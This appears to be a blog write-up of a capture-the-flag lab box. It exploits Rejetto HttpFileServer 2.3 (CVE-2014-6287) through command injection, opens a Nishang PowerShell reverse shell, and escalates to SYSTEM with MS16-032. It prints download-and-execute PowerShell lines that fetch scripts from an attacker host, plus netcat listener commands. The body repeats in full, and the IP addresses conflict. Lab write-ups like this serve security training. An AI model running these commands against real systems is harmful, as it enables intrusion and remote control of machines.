This is a Windows OS- IP: 10.10.10.2
Enumeration
This write up does not use Kali Linux. I chose to root the box the manual way. The IP for this box is 10.10.10.8. I chose to run nmap but you can run other tools such as sparta, masscan and unicornscan.The nmap scan reveals HttpFileServer httpd 2.3 running on port 80. Browing to the website and use ctrl + u keyboard combo to view the source code reveals the same.
Exploitation
Searchsploit reveals there is a exploit for it: searchsploit rejetto HttpFileServer 2.3. The exploit is also found on exploit-db or mitre.org and has CVE-2014-6287 which states that "remote attackers can execute arbitrary commands via sequence in a search action".Rojetto wiki gives examples of commands we can inject eg {.exec | notepad }.
Next we do null byte () injection via burp to test this. Send it to repeater and test the inject command by piping it to ping your IP. Set up tcpdump on your interface to verify that you can ping yourself (tcpdump -i tun0/eth0) and click go on repeater which should work and show that you have command execution as depicted by the http status code 200ok.
The next step is to get a reverse shell. We are going to use nishang which can be located at github-samratashok/nishang which you can git clone. I am going to use the Invoke-PowerShellTcp.ps1 from nishang. Use the example in the script (PS > Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444), modify it with your IP and copy it to the bottom of the script. We then run python -m SimpleHTTPServer to server everything over http from our local box.
Next we instert the following command in burp to execute in place of ping. Bear in mind that this is a 64 bit machine and see below for libraries that are for 64 bit windows. Set your listener to run as well (nc -lvnp 1337)
c:\Windows\System32 (32 bit binarries)
c:\Windows\Syswow64 (32 bit libraries)
C:\Windows\SysNative (64 bit binaries)
When we run/execute the powershell command we DO NOT get a shell. The error we made was not url encoding which is done by ctrl +u. After encoding we get a powershell command prompt.
We run systeminfo to see hotfixes and os versions (2012 R2). We then upload sherlock.ps1 from github to check for vulnerabilities using the command: IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.20:8000/Sherlock.ps1'). Don't forget to add the function Find-Allvulns at the bottom of the script.
Sherlock shows that the windows OS is vulnerable to MS16032 which can also be found on powershell Empire which has been edited to include custom commands. Copy the example provided in the script and update it with your Ip and port.
Rename Invoke-PowerShellTcp.ps1 to shell.ps1 and set up another listener on port 1338. This port should match shell.ps1. We do the renaming and new ports since we are already listening on 1337 using Invoke-PowerShellTcp.ps1.
Use the command "IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.20:8000/MS16032.ps1')" to get our priv esc exploit to our shell. Whoami on 1338 states we are NT AUTHORITY SYSTEM!!!!!
Enumeration
This write up does not use Kali Linux. I chose to root the box the manual way. The IP for this box is 10.10.10.8. I chose to run nmap but you can run other tools such as sparta, masscan and unicornscan.The nmap scan reveals HttpFileServer httpd 2.3 running on port 80. Browing to the website and use ctrl + u keyboard combo to view the source code reveals the same.
Exploitation
Searchsploit reveals there is a exploit for it: searchsploit rejetto HttpFileServer 2.3. The exploit is also found on exploit-db or mitre.org and has CVE-2014-6287 which states that "remote attackers can execute arbitrary commands via sequence in a search action".Rojetto wiki gives examples of commands we can inject eg {.exec | notepad }.
Next we do null byte () injection via burp to test this. Send it to repeater and test the inject command by piping it to ping your IP. Set up tcpdump on your interface to verify that you can ping yourself (tcpdump -i tun0/eth0) and click go on repeater which should work and show that you have command execution as depicted by the http status code 200ok.
The next step is to get a reverse shell. We are going to use nishang which can be located at github-samratashok/nishang which you can git clone. I am going to use the Invoke-PowerShellTcp.ps1 from nishang. Use the example in the script (PS > Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444), modify it with your IP and copy it to the bottom of the script. We then run python -m SimpleHTTPServer to server everything over http from our local box.
Next we instert the following command in burp to execute in place of ping. Bear in mind that this is a 64 bit machine and see below for libraries that are for 64 bit windows. Set your listener to run as well (nc -lvnp 1337)
c:\Windows\System32 (32 bit binarries)
c:\Windows\Syswow64 (32 bit libraries)
C:\Windows\SysNative (64 bit binaries)
When we run/execute the powershell command we DO NOT get a shell. The error we made was not url encoding which is done by ctrl +u. After encoding we get a powershell command prompt.
We run systeminfo to see hotfixes and os versions (2012 R2). We then upload sherlock.ps1 from github to check for vulnerabilities using the command: IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.20:8000/Sherlock.ps1'). Don't forget to add the function Find-Allvulns at the bottom of the script.
Sherlock shows that the windows OS is vulnerable to MS16032 which can also be found on powershell Empire which has been edited to include custom commands. Copy the example provided in the script and update it with your Ip and port.
Rename Invoke-PowerShellTcp.ps1 to shell.ps1 and set up another listener on port 1338. This port should match shell.ps1. We do the renaming and new ports since we are already listening on 1337 using Invoke-PowerShellTcp.ps1.
Use the command "IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.20:8000/MS16032.ps1')" to get our priv esc exploit to our shell. Whoami on 1338 states we are NT AUTHORITY SYSTEM!!!!!
Comments
Post a Comment